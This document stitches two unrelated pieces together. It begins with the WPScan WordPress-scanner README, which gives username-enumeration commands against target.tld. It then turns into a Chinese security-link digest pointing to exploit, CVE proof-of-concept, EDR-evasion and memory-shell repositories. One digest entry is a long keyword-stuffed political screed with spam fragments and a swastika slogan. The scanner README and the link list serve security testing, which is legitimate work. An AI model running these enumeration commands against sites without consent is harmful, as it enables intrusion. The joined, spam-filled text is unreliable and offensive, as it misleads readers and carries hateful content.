```wpscan --update``` Updating WPScan itself is either done via ```gem update wpscan``` or the packages manager (this is quite important for distributions such as in Kali Linux: ```apt-get update && apt-get upgrade```) depending on how WPScan was (pre)installed # Docker Pull the repo with ```docker pull wpscanteam/wpscan``` Enumerating usernames ```shell docker run -it --rm wpscanteam/wpscan --url https://target.tld/ --enumerate u ``` Enumerating a range of usernames ```shell docker run -it --rm wpscanteam/wpscan --url https://target.tld/ --enumerate u1-100 ``` ** replace u1-100 with a range of your choice. # Usage Full user documentation can be found here; https://github.com/wpscanteam/wpscan/wiki/WPScan-User-Documentation ```wpscan --url blog.tld``` This will scan the blog using default options with a good compromise between speed and accuracy. For example, the plugins will be checked passively but their version with a mixed detection mode (passively + aggressively). Potential config backup files will also be checked, along with other interesting findings. If a more stealthy approach is required, then ```wpscan --stealthy --url blog.tld``` can be used. As a result, when using the ```--enumerate``` option, don't forget to set the ```--plugins-detection``` accordingly, as its default is 'passive'. For more options, open a terminal and type ```wpscan --help``` (if you built wpscan from the source, you should type the command outside of the git repo) The DB is located at ~/.wpscan/db ## Optional: WordPress Vulnerability Database API The WPScan CLI tool uses the [WordPress Vulnerability Database API](https://wpscan.com/api) to retrieve WordPress vulnerability data in real time. For WPScan to retrieve the vulnerability data an API token must be supplied via the `--api-token` option, or via a configuration file, as discussed below. An API token can be obtained by registering an account on [WPScan.com](https://wpscan.com/register). Up to **25** API requests per day are given free of charge, that should be suitable to scan most WordPress websites at least once per day. When the daily 25 API requests are exhausted, WPScan will continue to work as normal but without any vulnerability data. ### How many API requests do you need? - Our WordPress scanner makes one API request for the WordPress version, one request per installed plugin and one request per installed theme. - On average, a WordPress website has 22 installed plugins. ## Load CLI options from file/s WPScan can load all options (including the --url) from configuration files, the following locations are checked (order: first to last): - ~/.wpscan/scan.json - ~/.wpscan/scan.yml - pwd/.wpscan/scan.json - pwd/.wpscan/scan.yml If those files exist, options from the `cli_options` key will be loaded and overridden if found twice. e.g: ~/.wpscan/scan.yml: ```yml cli_options: proxy: 'http://127.0.0.1:8080' verbose: true ``` pwd/.wpscan/scan.yml: ```yml cli_options: proxy: 'socks5://127.0.0.1:9090' url: 'http://target.tld' ``` Running ```wpscan``` in the current directory (pwd), is the same as ```wpscan -v --proxy socks5://127.0.0.1:9090 --url http://target.tld``` ## Save API Token in a file The feature mentioned above is useful to keep the API Token in a config file and not have to supply it via the CLI each time. To do so, create the ~/.wpscan/scan.yml file containing the below: ```yml cli_options: api_token: 'YOUR_API_TOKEN' ``` ## Load API Token From ENV (since v3.7.10) The API Token will be automatically loaded from the ENV variable `WPSCAN_API_TOKEN` if present. If the `--api-token` CLI option is also provided, the value from the CLI will be used. ## Enumerating usernames ```shell wpscan --url https://target.tld/ --enumerate u ``` Enumerating a range of usernames ```shell wpscan --url https://target.tld/ --enumerate u1-100 ``` ** replace u1-100 with a range of your choice. # LICENSE ## WPScan Public Source License The WPScan software (henceforth referred to simply as "WPScan") is dual-licensed - Copyright 2011-2019 WPScan Team. Cases that include commercialization of WPScan require a commercial, non-free license. Otherwise, WPScan can be used without charge under the terms set out below. ### 1. Definitions 1.1 "License" means this document. 1.2 "Contributor" means each individual or legal entity that creates, contributes to the creation of, or owns WPScan. 1.3 "WPScan Team" means WPScan’s core developers. ### 2. Commercialization A commercial use is one intended for commercial advantage or monetary compensation. Example cases of commercialization are: - Using WPScan to provide commercial managed/Software-as-a-Service services. - Distributing WPScan as a commercial product or as part of one. - Using WPScan as a value added service/product. Example cases which do not require a commercial license, and thus fall under the terms set out below, include (but are not limited to): - Penetration testers (or penetration testing organizations) using WPScan as part of their assessment toolkit. - Penetration Testing Linux Distributions including but not limited to Kali Linux, SamuraiWTF, BackBox Linux. - Using WPScan to test your own systems. - Any non-commercial use of WPScan. If you need to purchase a commercial license or are unsure whether you need to purchase a commercial license contact us - [email protected]. Free-use Terms and Conditions; ### 3. Redistribution Redistribution is permitted under the following conditions: - Unmodified License is provided with WPScan. - Unmodified Copyright notices are provided with WPScan. - Does not conflict with the commercialization clause. ### 4. Copying Copying is permitted so long as it does not conflict with the Redistribution clause. ### 5. Modification Modification is permitted so long as it does not conflict with the Redistribution clause. ### 6. Contributions Any Contributions assume the Contributor grants the WPScan Team the unlimited, non-exclusive right to reuse, modify and relicense the Contributor's content. ### 7. Support WPScan is provided under an AS-IS basis and without any support, updates or maintenance. Support, updates and maintenance may be given according to the sole discretion of the WPScan Team. ### 8. Disclaimer of Warranty WPScan is provided under this License on an “as is” basis, without warranty of any kind, either expressed, implied, or statutory, including, without limitation, warranties that the WPScan is free of defects, merchantable, fit for a particular purpose or non-infringing. ### 9. Limitation of Liability To the extent permitted under Law, WPScan is provided under an AS-IS basis. The WPScan Team shall never, and without any limit, be liable for any damage, cost, expense or any other payment incurred as a result of WPScan's actions, failure, bugs and/or any other interaction between WPScan and end-equipment, computers, other software or any 3rd party, end-equipment, computer or services. ### 10. Disclaimer Running WPScan against websites without prior mutual consent may be illegal in your country. The WPScan Team accept no liability and are not responsible for any misuse or damage caused by WPScan. ### 11. Trademark The "wpscan" term is a registered trademark. This License does not grant the use of the "wpscan" trademark or the use of the WPScan logo.
# 互联网安全 推荐 | ts | title | url| | --- | --- | ---| # 玄武实验室 推荐 | ts | title | url| | --- | --- | ---| | 20220427 | 2022 未知之境 腾讯网络安全T-Star高校挑战赛 WriteUp | http://tttang.com/archive/1577/| | 20220427 | Adobe Acrobat 的浏览器扩展被发现存在破坏同源策略(SOP)的漏洞 | http://palant.info/2022/04/19/adobe-acrobat-hollowing-out-same-origin-policy/| | 20220427 | 云安全渗透测试方向的资料 | https://github.com/TROUBLE-1/Cloud-Pentesting| | 20220427 | ZeroCon 会议议题 “A Journey Of Hunting macOS kernel” | https://github.com/star-sg/Presentations/blob/main/Zer0Con%202022/A%20Journey%20Of%20Hunting%20macOS%20kernel.pptx| | 20220427 | Introduction to VirtualBox security research | http://blog.doyensec.com//2022/04/26/vbox-fuzzing.html| | 20220427 | Quarkslab 建立源码 Commit 级别的漏洞数据库,管理 Android 的历史漏洞信息 | http://blog.quarkslab.com/commit-level-vulnerability-dataset.html| | 20220427 | 需要有一种新的漏洞管理方案,替代 CVE 实现在云安全场景中的漏洞管理 | https://threatpost.com/cve-cloud-bug-system/179394/| | 20220427 | go-fuzz 优化实践 | http://blog.trailofbits.com/2022/04/26/improving-the-state-of-go-fuzz/| | 20220427 | Stairwell 安全团队对朝鲜 APT37 组织近期利用 Goldbackdoor 发起攻击的分析报告 | https://threatpost.com/hackers-target-journalists-goldbackdoor/179389/| | 20220427 | 浏览器调试之网络抓包 | https://www.youtube.com/watch?v=ACvjQNl01MA| | 20220427 | Paper Progressive Scrutiny: Incremental Detection of UBI bugs in the Linux Kernel,利用符号执行技术,在 Linux 代码仓库中扫描增量代码检测变量未初始化漏洞 | https://github.com/seclab-ucr/IncreLux| | 20220427 | Encrypting our way to SSRF in VMWare Workspace One UEM (CVE-2021-22054) | https://blog.assetnote.io/2022/04/27/vmware-workspace-one-uem-ssrf/| | 20220427 | 在内核 eBPF 层面基于机器学习实现 Flow-based IDS | https://arxiv.org/abs/2102.09980| | 20220427 | 利用开源工具分析 Azure AD 环境的攻击面 | http://o365blog.com/talks/ICEIS2022_slides.pdf| | 20220427 | 有研究员公开了一个利用 CVE-2021-30937 漏洞实现 iOS 15.0 - 15.1.1 内核读写的 Exploit | http://github.com/potmdehex/multicast_bytecopy| | 20220427 | Bypass EDR 基于内存分配事件监控的威胁检测 | https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection| # 安全维基 推荐 | ts | title | url| | --- | --- | ---| | 20220427 | CodeQL进阶知识(Java) | https://mp.weixin.qq.com/s/ZCl9kaMsZLqc74VzErHCGw| | 20220427 | 从源代码的控制流图中学习特性以定位缺陷 | https://mp.weixin.qq.com/s/jzQy2KmCiLmJ_RHaPVc4ew| | 20220427 | A blueprint for evading industry leading endpoint protecti... | https://vanmieghem.io/blueprint-for-evading-edr-in-2022/| | 20220427 | 国资委:将网络安全纳入央企负责人经营业绩考核 | http://www.sasac.gov.cn/n2588035/n2588320/n2588335/c10652592/content.html| # CVE Github 推荐 | ts | cve_id | title | url | cve_detail| | --- | --- | --- | --- | ---| | 20220427T20:43:08Z | CVE-2021-40444 | Null | https://github.com/QwertyStack/CVE-2021-40444_PoC | | | 20220427T16:44:31Z | CVE-2022-29464 | WSO2 RCE (CVE-2022-29464) exploit and writeup. | https://github.com/hakivvi/CVE-2022-29464 | | | 20220427T12:15:31Z | CVE-2021-0589 | Null | https://github.com/Nivaskumark/A10_system_bt_CVE-2021-0589 | | | 20220427T11:50:52Z | CVE-2022-23990 | Null | https://github.com/Nivaskumark/expat_A10_r33_2_2_6_CVE-2022-23990 | | | 20220427T08:13:27Z | CVE-2022-22965 | Null | https://github.com/khidottrivi/CVE-2022-22965 | | | 20220427T05:22:34Z | CVE-2021-0315 | Null | https://github.com/nanopathi/frameworks_base1_CVE-2021-0315 | | | 20220427T05:01:01Z | CVE-2020-0394 | Null | https://github.com/pazhanivel07/Settings_10-r33_CVE-2020-0394_02 | | | 20220427T04:46:29Z | CVE-2020-0394 | Null | https://github.com/pazhanivel07/Settings_10-r33_CVE-2020-0394 | | | 20220427T04:40:51Z | CVE-2021-0394 | Null | https://github.com/nanopathi/packages_apps_Settings_CVE-2021-0394 | | | 20220427T01:52:33Z | cve-2022-22947 | CVE-2022-22947 注入Godzilla内存马 | https://github.com/whwlsfb/cve-2022-22947-godzilla-memshell | | # klee on Github 推荐 | ts | title | url | stars | forks| | --- | --- | --- | --- | ---| | 20220427T16:31:09Z | KLEE Symbolic Execution Engine | https://github.com/klee/klee | 1960 | 554| | 20220427T05:16:10Z | 芫荽,基於 Klee One 改造的學習用台灣繁體字型 | https://github.com/ButTaiwan/iansui | 639 | 35| # s2e on Github 推荐 | ts | title | url | stars | forks| | --- | --- | --- | --- | ---| # exploit on Github 推荐 | ts | title | url | stars | forks| | --- | --- | --- | --- | ---| | 20220427T23:41:03Z | My little exploition collection, ;). | https://github.com/0x98a/Exploit-Collection | 0 | 0| | 20220427T23:18:08Z | This repository is primarily maintained by Omar Santos and includes thousands of resources related to ethical hacking / penetration testing, digital forensics and incident response (DFIR), vulnerability research, exploit development, reverse engineering, and more. | https://github.com/The-Art-of-Hacking/h4cker | 11046 | 1933| | 20220427T23:17:36Z | Inasive ductal carcinoma (IDC) is - with ~ 80 % of cases - one of the most common types of breast cancer. It%s malicious and able to form metastases which makes it especially dangerous. Often a biopsy is done to remove small tissue samples. Then a pathologist has to decide whether a patient has IDC, another type of breast cancer or is healthy. In addition sick cells need to be located to find out how advanced the disease is and which grade should be assigned. This has to be done manually and is a time consuming process. Furthermore the decision depends on the expertise of the pathologist and his or her equipment. Therefor deep learning could be of great help to automatically detect and locate tumor tissue cells and to speed up the process. In order to exploit the full potential one could build a pipeline using massive amounts of tissue image data of various hospitals that were evaluated by different experts. This way one would be able to overcome the dependence on the pathologist which would be especially useful in regions where no experts are available. | https://github.com/AhmedMMahrous/Breast-Cancer-IDC-Deep-Learning | 0 | 0| | 20220427T21:48:39Z | Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters.. | https://github.com/KingOfBugbounty/KingOfBugBountyTips | 2893 | 529| | 20220427T19:00:35Z | Python Exploitation is a collection of special tools for providing high quality penetration testing using pure python programming language. | https://github.com/EntySec/Pex | 5 | 1| | 20220427T13:44:57Z | 聚合Github上已有的Poc或者Exp,CVE信息来自CVE官网。Auto Collect Poc Or Exp from Github by CVE ID. | https://github.com/ycdxsb/PocOrExp_in_Github | 395 | 115| | 20220427T12:47:16Z | A quick attempt at fixing an exploit(?) with the load_itempreset command | https://github.com/rowedahelicon/TF2---Loadout-Respawn-Fix | 0 | 0| | 20220427T12:38:17Z | This site has a lot of security breaches to exploit. Do not install on production environments! | https://github.com/wesleyit/python_safesite | 9 | 4| | 20220427T12:23:39Z | 反中共政治宣传库。Anti Chinese government propaganda. https://github.com/cirosantilli/china-dictatorship 的备份backup. 住在中国真名用户的网友请别给星星,不然你要被警察请喝茶。常见问答集,新闻集和饭店和音乐建议。卐习万岁卐。冠状病毒审查郝海东新疆改造中心六四事件法轮功 996.ICU709大抓捕巴拿马文件邓家贵低端人口西藏骚乱。Friends who live in China and have real name on account, please don%t star this repo, or else the police might pay you a visit. Home to the mega-FAQ, news compilation, restaurant and music recommendations.Heil Xi 卐. 大陆修宪香港恶法台湾武统朝鲜毁约美中冷战等都是王沪宁愚弄习思想极左命运共同体的大策划中共窃国这半个多世纪所犯下的滔天罪恶,前期是毛泽东策划的,中期6.4前后是邓小平策划的,黄牛数据分析后期是毛的极左追随者三朝罪恶元凶王沪宁策划的。王沪宁高小肆业因文革政治和情报需要保送“学院外语班“红色仕途翻身,所以王的本质是极左的。他是在上海底层弄堂长大的,因其本性也促成其瘪三下三滥个性,所以也都说他有易主“变色龙”哈巴狗“的天性。大陆像王沪宁这样学马列政治所谓%法学%专业的人,在除朝鲜古巴所有国家特别是在文明发达国家是无法找到专业对口工作必定失业,唯独在大陆却是重用的紧缺“人才”,6.4后中共信仰大危机更是最重用的救党“人才”。这也就是像王沪宁此类工农兵假“大学生”平步青云的原因,他们最熟悉毛泽东历次运动的宫庭内斗经验手段和残酷的阶级斗争等暴力恐怖的“政治学”。王沪宁能平步青云靠他这马毛伪“政治学”资本和头衔,不是什么真才实学,能干实事有点真才实学的或许在他手下的谋士及秘书班子中可以找到。王沪宁的“真才实学”只不过是一个只读四年小学的人,大半辈子在社会上磨炼特别是在中共官场滚打炼出的的手段和经验而已,他和习近平等保送的工农兵假“大学生”都一样,无法从事原“专业”都凭红资本而从政。六四学运期间各界一边倒支持学生,王沪宁一度去法国躲避和筹谋,他还加入了反学运签名,成为极少有的反学运者仕途突显,在六四和苏联垮台后中共意识形态危机,江泽民上台看上唯一能应急的王沪宁聚谋士泡制的%稳定统一领导%和之后的%新权威%谬论。左转被邓小平南巡阻止后,王策划顺邓经济改革却将政治改革逐步全面终止和倒退,泡制“三个代表”为极左转建立庞大牢固的红色既得利益集团。因此六四后各重大决策和危机难题都摆在中共中央政策研究室王沪宁桌面上,使王沪宁成了此后中共三朝都无法摆脱的幕后最有决策性实权的人,中共中央政策研究室是王为其野心巨资经营几十年,聚众谋士的间谍情报汇总研究的特务机关和策划制定决策重要机构与基地,王沪宁本人和决定其仕途关键的首任岳父及家属就有情报工作背景。中央政研室重要到王沪宁入常后为了死抓这中共情报与决策大权,宁可放弃国家副主席和中央党校校长。后再加个除习外唯他担任的中共几核心领导小组之一的“不忘初心牢记使命”主题教育工作小组组长。此后他把持的舆论必将以宣传“不忘初心牢记使命”为主,打造众所周知的所谓“习思想”其实是”王思想“。王自从主导中央政研室开始决策后,策划中止邓小平的与美妥协路线回归毛极左的反美路线。帮助前南斯拉夫提供情报打落美机放中使馆引发炸使馆事件,以此掀起六四后唯一的全国大规模游行并借此反美而起家。后又帮江泽民提供法轮功会是超过中共组织的情报,策划决策镇压迫害开始并没有把矛头指向江的法轮功群体,策划决定阻止党内外近三十年来平反六四的呼声。致远黑皮书马拉松程序员易支付英语台词文字匹配美团点评各业务线提供知识库团队共享阿里云高精Excel识别德讯 ·吉特胡布薄熙来黑科技习近平讲话模拟器习近平音源黑马程序员MySQL数据库玉米杂草数据集销售系统开发疫情期间网民情绪识别比赛996icu996 icu学习强国预测结果导出赖伟林刺杀小说家购物商场英语词汇量小程序联级选择器Bitcoin区块链 技术面试必备基础知识 Leetcode 计算机操作系统 计算机网络 系统设计 Java学习 面试指南 一份涵盖大部分 Java 程序员所需要掌握的核心知识 准备 Java 面试 首选 JavaGuide Python 1 天从新手到大师刷算法全靠套路 认准 labuladong 就够了 免费的计算机编程类中文书籍 欢迎投稿用动画的形式呈现解LeetCode题目的思路 互联网 Java 工程师进阶知识完全扫盲 涵盖高并发 分布式 高可用 微服务 海量数据处理等领域知识后端架构师技术图谱mall项目是一套电商系统 包括前台商城系统及后台管理系统 基于SpringBoot MyBatis实现 采用Docker容器化部署 前台商城系统包含首页门户 商品推荐 商品搜索 商品展示 购物车 订单流程 会员中心 客户服务 帮助中心等模块 后台管理系统包含商品管理 订单管理 会员管理 促销管理 运营管理 内容管理 统计报表 财务管理 权限管理 设置等模块 微信小程序开发资源汇总 最全中华古诗词数据库 唐宋两朝近一万四千古诗人 接近5 5万首唐诗加26万宋诗 两宋时期1564位词人 21 5 首词 uni app 是使用 Vue 语法开发小程序 H5 App的统一框架2 21年最新总结 阿里 腾讯 百度 美团 头条等技术面试题目 以及答案 专家出题人分析汇总 科学上网 自由上网 翻墙 软件 方法 一键翻墙浏览器 免费账号 节点分享 vps一键搭建脚本 教程AiLearning 机器学习 MachineLearning ML 深度学习 DeepLearning DL 自然语言处理 NLP123 6智能刷票 订票开放式跨端跨框架解决方案 支持使用 React Vue Nerv 等框架来开发微信 京东 百度 支付宝 字节跳动 QQ 小程序 H5 React Native 等应用 taro zone 掘金翻译计划 可能是世界最大最好的英译中技术社区 最懂读者和译者的翻译平台 no evil 程序员找工作黑名单 换工作和当技术合伙人需谨慎啊 更新有赞 算法面试 算法知识 针对小白的算法训练 还包括 1 阿里 字节 滴滴 百篇大厂面经汇总 2 千本开源电子书 3 百张思维导图 右侧来个 star 吧 English version supported 955 不加班的公司名单 工作 955 work–life balance 工作与生活的平衡 诊断利器Arthas The Way to Go 中文译本 中文正式名 Go 入门指南 Java面试 Java学习指南 一份涵盖大部分Java程序员所需要掌握的核心知识 教程 技术栈示例代码 快速简单上手教程 2 17年买房经历总结出来的买房购房知识分享给大家 希望对大家有所帮助 买房不易 且买且珍惜http下载工具 基于http代理 支持多连接分块下载 动手学深度学习 面向中文读者 能运行 可讨论 中英文版被全球175所大学采用教学 阿里云计算平台团队出品 为监控而生的数据库连接池程序员简历模板系列 包括PHP程序员简历模板 iOS程序员简历模板 Android程序员简历模板 Web前端程序员简历模板 Java程序员简历模板 C C 程序员简历模板 NodeJS程序员简历模板 架构师简历模板以及通用程序员简历模板采用自身模块规范编写的前端 UI 框架 遵循原生 HTML CSS JS 的书写形式 极低门槛 拿来即用 贵校课程资料民间整理 企业级低代码平台 前后端分离架构强大的代码生成器让前后端代码一键生成 无需写任何代码 引领新的开发模式OnlineCoding 代码生成 手工MERGE 帮助Java项目解决7 %重复工作 让开发更关注业务 既能快速提高效率 帮助公司节省成本 同时又不失灵活性 我是依扬 木易杨 公众号 高级前端进阶 作者 每天搞定一道前端大厂面试题 祝大家天天进步 一年后会看到不一样的自己 冴羽写博客的地方 预计写四个系列 JavaScript深入系列 JavaScript专题系列 ES6系列 React系列 中文分词 词性标注 命名实体识别 依存句法分析 语义依存分析 新词发现 关键词短语提取 自动摘要 文本分类聚类 拼音简繁转换 自然语言处理flutter 开发者帮助 APP 包含 flutter 常用 14 组件的demo 演示与中文文档 下拉刷新 上拉加载 二级刷新 淘宝二楼智能下拉刷新框架 支持越界回弹 越界拖动 具有极强的扩展性 集成了几十种炫酷的Header和 Footer 该项目已成功集成 actuator 监控 admin 可视化监控 logback 日志 aopLog 通过AOP记录web请求日志 统一异常处理 json级别和页面级别 freemarker 模板引擎 thymeleaf 模板引擎 Beetl 模板引擎 Enjoy 模板引擎 JdbcTemplate 通用JDBC操作数据库 JPA 强大的ORM框架 mybatis 强大的ORM框架 通用Mapper 快速操作Mybatis PageHelper 通用的Mybatis分页插件 mybatis plus 快速操作Mybatis BeetlSQL 强大的ORM框架 u Python资源大全中文版 包括 Web框架 网络爬虫 模板引擎 数据库 数据可视化 图片处理等 由 开源前哨 和 Python开发者 微信公号团队维护更新 吴恩达老师的机器学习课程个人笔记To Be Top Javaer Java工程师成神之路循序渐进 学习博客Spring系列源码 mrbird cc谢谢可能是让你受益匪浅的英语进阶指南镜像网易云音乐 Node js API service快速 简单避免OOM的java处理Excel工具基于 Vue js 的小程序开发框架 从底层支持 Vue js 语法和构建工具体系 中文版 Apple 官方 Swift 教程本项目曾冲到全球第一 干货集锦见本页面最底部 另完整精致的纸质版 编程之法 面试和算法心得 已在京东 当当上销售好耶 是女装Security Guide for Developers 实用性开发人员安全须知 阿里巴巴 MySQL binlog 增量订阅 消费组件 ECMAScript 6入门 是一本开源的 JavaScript 语言教程 全面介绍 ECMAScript 6 新增的语法特性 C C 技术面试基础知识总结 包括语言 程序库 数据结构 算法 系统 网络 链接装载库等知识及面试经验 招聘 内推等信息 一款优秀的开源博客发布应用 Solutions to LeetCode by Go 1 % test coverage runtime beats 1 % LeetCode 题解分布式任务调度平台XXL JOB 谷粒 Chrome插件英雄榜 为优秀的Chrome插件写一本中文说明书 让Chrome插件英雄们造福人类公众号 加1 同步更新互联网公司技术架构 微信 淘宝 微博 腾讯 阿里 美团点评 百度 Google Facebook Amazon eBay的架构 欢迎PR补充IntelliJ IDEA 简体中文专题教程程序员技能图谱前端面试每日 3 1 以面试题来驱动学习 提倡每日学习与思考 每天进步一点 每天早上5点纯手工发布面试题 死磕自己 愉悦大家 4 道前端面试题全面覆盖小程序 软技能 华为鸿蒙操作系统 互联网首份程序员考公指南 由3位已经进入体制内的前大厂程序员联合献上 Mac微信功能拓展 微信插件 微信小助手 A plugin for Mac WeChat 机器学习 西瓜书 公式推导解析 在线阅读地址一款轻量级 高性能 功能强大的内网穿透代理服务器 支持tcp udp socks5 http等几乎所有流量转发 可用来访问内网网站 本地支付接口调试 ssh访问 远程桌面 内网dns解析 内网socks5代理等等 并带有功能强大的web管理端一款面向泛前端产品研发全生命周期的效率平台 文言文編程語言清华大学计算机系课程攻略面向云原生微服务的高可用流控防护组件 On Java 8 中文版 本文原文由知名 Hacker Eric S Raymond 所撰寫 教你如何正確的提出技術問題並獲得你滿意的答案 React Native指南汇集了各类react native学习资源 开源App和组件1 Days Of ML Code中文版千古前端图文教程 超详细的前端入门到进阶学习笔记 从零开始学前端 做一名精致优雅的前端工程师 公众号 千古壹号 作者 基于 React 的渐进式研发框架 ice work视频播放器支持弹幕 外挂字幕 支持滤镜 水印 gif截图 片头广告 中间广告 多个同时播放 支持基本的拖动 声音 亮度调节 支持边播边缓存 支持视频自带rotation的旋转 9 27 之类 重力旋转与手动旋转的同步支持 支持列表播放 列表全屏动画 视频加载速度 列表小窗口支持拖动 动画效果 调整比例 多分辨率切换 支持切换播放器 进度条小窗口预览 列表切换详情页面无缝播放 rtsp concat mpeg JumpServer 是全球首款开源的堡垒机 是符合 4A 的专业运维安全审计系统 Linux命令大全搜索工具 内容包含Linux命令手册 详解 学习 搜集 git io linux book Node js 包教不包会 by alsotang又一个小商城 litemall Spring Boot后端 Vue管理员前端 微信小程序用户前端 Vue用户移动端微信 跳一跳 Python 辅助Java资源大全中文版 包括开发库 开发工具 网站 博客 微信 微博等 由伯乐在线持续更新 python模拟登陆一些大型网站 还有一些简单的爬虫 希望对你们有所帮助 ️ 如果喜欢记得给个star哦 C 那些事 网络爬虫实战 淘宝 京东 网易云 B站 123 6 抖音 笔趣阁 漫画小说下载 音乐电影下载等deeplearning ai 吴恩达老师的深度学习课程笔记及资源 Spring Boot基础教程 Spring Boot 2 x版本连载中 帮助 Android App 进行组件化改造的路由框架 最接近原生APP体验的高性能框架基于Vue3 Element Plus 的后台管理系统解决方案程序员如何优雅的挣零花钱 2 版 升级为小书了 从Java基础 JavaWeb基础到常用的框架再到面试题都有完整的教程 几乎涵盖了Java后端必备的知识点spring boot 实践学习案例 是 spring boot 初学者及核心技术巩固的最佳实践 另外写博客 用 OpenWrite 最好用的 V2Ray 一键安装脚本 管理脚本中国程序员容易发音错误的单词 统计学习方法 的代码实现关于Python的面试题本项目将 动手学深度学习 Dive into Deep Learning 原书中的MXNet实现改为PyTorch实现 提高 Android UI 开发效率的 UI 库前端精读周刊 帮你理解最前沿 实用的技术 的奇技淫巧时间选择器 省市区三级联动 Python爬虫代理IP池 proxy pool LeetCode 刷题攻略 2 道经典题目刷题顺序 共6 w字的详细图解 视频难点剖析 5 余张思维导图 从此算法学习不再迷茫 来看看 你会发现相见恨晚 一个基于 electron 的音乐软件Flutter 超完整的开源项目 功能丰富 适合学习和日常使用 GSYGithubApp系列的优势 我们目前已经拥有四个版本 功能齐全 项目框架内技术涉及面广 完成度高 持续维护 配套文章 适合全面学习 对比参考 跨平台的开源Github客户端App 更好的体验 更丰富的功能 旨在更好的日常管理和维护个人Github 提供更好更方便的驾车体验Σ 同款Weex版本同款React Native版本 https g 这是一个用于显示当前网速 CPU及内存利用率的桌面悬浮窗软件 并支持任务栏显示 支持更换皮肤 是一个跨平台的强加密无特征的代理软件 零配置 V2rayU 基于v2ray核心的mac版客户端 用于科学上网 使用swift编写 支持vmess shadowsocks socks5等服务协议 支持订阅 支持二维码 剪贴板导入 手动配置 二维码分享等算法模板 最科学的刷题方式 最快速的刷题路径 你值得拥有 经典编程书籍大全 涵盖 计算机系统与网络 系统架构 算法与数据结构 前端开发 后端开发 移动开发 数据库 测试 项目与团队 程序员职业修炼 求职面试等wangEditor 轻量级web富文本框前端跨框架跨平台框架 每个 JavaScript 工程师都应懂的33个概念 leonardomso一个可以观看国内主流视频平台所有视频的客户端Android开发人员不得不收集的工具类集合 支付宝支付 微信支付 统一下单 微信分享 Zip4j压缩 支持分卷压缩与加密 一键集成UCrop选择圆形头像 一键集成二维码和条形码的扫描与生成 常用Dialog WebView的封装可播放视频 仿斗鱼滑动验证码 Toast封装 震动 GPS Location定位 图片缩放 Exif 图片添加地理位置信息 经纬度 蛛网等级 颜色选择器 ArcGis VTPK 编译运行一下说不定会找到惊喜 123 6 购票助手 支持集群 多账号 多任务购票以及 Web 页面管理 编程随想 收藏的电子书清单 多个学科 含下载链接 Banner 2 来了 Android广告图片轮播控件 内部基于ViewPager2实现 Indicator和UI都可以自定义 零代码 热更新 自动化 ORM 库 后端接口和文档零代码 前端 客户端 定制返回 JSON 的数据和结构 Linux Windows macOS 跨平台 V2Ray 客户端 支持使用 C Qt 开发 可拓展插件式设计 walle 瓦力 Devops开源项目代码部署平台基于 node js Mongodb 构建的后台系统 js 源码解析一个涵盖六个专栏分布式消息队列 分布式事务的仓库 希望胖友小手一抖 右上角来个 Star 感恩 1 24基于 vue element ui 的后台管理系统磁力链接聚合搜索中华人民共和国行政区划 省级 省份直辖市自治区 地级 城市 县级 区县 乡级 乡镇街道 村级 村委会居委会 中国省市区镇村二级三级四级五级联动地址数据 iOS开发常用三方库 插件 知名博客等等LeetCode题解 151道题完整版/中文文案排版指北最良心的 Python 教程 业内为数不多致力于极致体验的超强全自研跨平台 windows android iOS 流媒体内核 通过模块化自由组合 支持实时RTMP推流 RTSP推流 RTMP播放器 RTSP播放器 录像 多路流媒体转发 音视频导播 动态视频合成 音频混音 直播互动 内置轻量级RTSP服务等 比快更快 业界真正靠谱的超低延迟直播SDK 1秒内 低延迟模式下2 4 ms 一个 PHP 微信 SDK ️ 跨平台桌面端视频资源播放器 简洁无广告 免费高颜值 后台管理主线版本基于三者并行开发维护 同时支持电脑 手机 平板 切换分支查看不同的vue版本 element plus版本已发布 vue3 vue3 vue vue3 x vue js 程序无国界 但程序员有国界 中国国家尊严不容挑衅 如果您在特殊时期 此项目是机器学习 Machine Learning 深度学习 Deep Learning NLP面试中常考到的知识点和代码实现 也是作为一个算法工程师必会的理论基础知识 夜读 通过 bilibili 在线直播的方式分享 Go 相关的技术话题 每天大家在微信 telegram Slack 上及时沟通交流编程技术话题 GitHubDaily 分享内容定期整理与分类 欢迎推荐 自荐项目 让更多人知道你的项目 支持多家云存储的云盘系统机器学习相关教程DataX是阿里云DataWorks数据集成的开源版本 这里是写博客的地方 Halfrost Field 冰霜之地mall学习教程 架构 业务 技术要点全方位解析 mall项目 4 k star 是一套电商系统 使用现阶段主流技术实现 涵盖了等技术 采用Docker容器化部署 chick 是使用 Node js 和 MongoDB 开发的社区系统一个非常适合IT团队的在线API文档 技术文档工具汇总各大互联网公司容易考察的高频leetcode题 1 Chinese Word Vectors 上百种预训练中文词向量 Android开源弹幕引擎 烈焰弹幕使 ~深度学习框架PyTorch 入门与实战 网易云音乐命令行版本 对开发人员有用的定律 理论 原则和模式TeachYourselfCS 的中文翻译高颜值的第三方网易云播放器 支持 Windows macOS Linux spring cloud vue oAuth2 全家桶实战 前后端分离模拟商城 完整的购物流程 后端运营平台 可以实现快速搭建企业级微服务项目 支持微信登录等三方登录 Chinese sticker pack More joy 表情包的博物馆 Github最有毒的仓库 中国表情包大集合 聚欢乐 Lantern官方版本下载 蓝灯 翻墙 代理 科学上网 外网 加速器 梯子 路由一款入门级的人脸 视频 文字检测以及识别的项目 vue2 vue router vuex 入门项目PanDownload的个人维护版本 一个基于Spring Boot MyBatis的种子项目 用于快速构建中小型API RESTful API项目 iOS interview questions iOS面试题集锦 附答案 学习qq群或 Telegram 群交流为互联网IT人打造的中文版awesome go强大 可定制 易扩展的 ViewPager 指示器框架 是的最佳替代品 支持角标 更支持在非ViewPager场景下使用 使用hide show 切换Fragment或使用se Kubernetes中文指南 云原生应用架构实践手册For macOS 百度网盘 破解SVIP 下载速度限制 架构师技术图谱 助你早日成为架构师mall admin web是一个电商后台管理系统的前端项目 基于Vue Element实现 主要包括商品管理 订单管理 会员管理 促销管理 运营管理 内容管理 统计报表 财务管理 权限管理 设置等功能 网易云音乐第三方 编程随想 整理的 太子党关系网络 专门揭露赵国的权贵基于gin vue搭建的后台管理系统框架 集成jwt鉴权 权限管理 动态路由 分页封装 多点登录拦截 资源权限 上传下载 代码生成器 表单生成器 通用工作流等基础功能 五分钟一套CURD前后端代码 目VUE3版本正在重构 欢迎issue和pr 27天成为Java大神一个基于浏览器端 JS 实现的在线代理编程电子书 电子书 编程书籍 